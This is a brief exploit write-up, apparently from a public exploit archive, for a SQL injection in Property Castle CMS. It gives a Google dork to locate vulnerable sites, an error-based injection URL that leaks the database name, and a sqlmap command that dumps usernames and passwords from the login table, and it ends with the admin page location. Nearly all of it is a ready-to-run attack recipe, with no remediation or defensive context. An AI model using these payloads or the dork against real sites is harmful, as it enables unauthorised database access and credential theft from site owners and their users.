# Exploit Title: Property Castle CMS post SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: kali linux on iceweasel browser
# EXPLOIT
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have database name
2- we search "contact us" page
3- we use "http header" to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php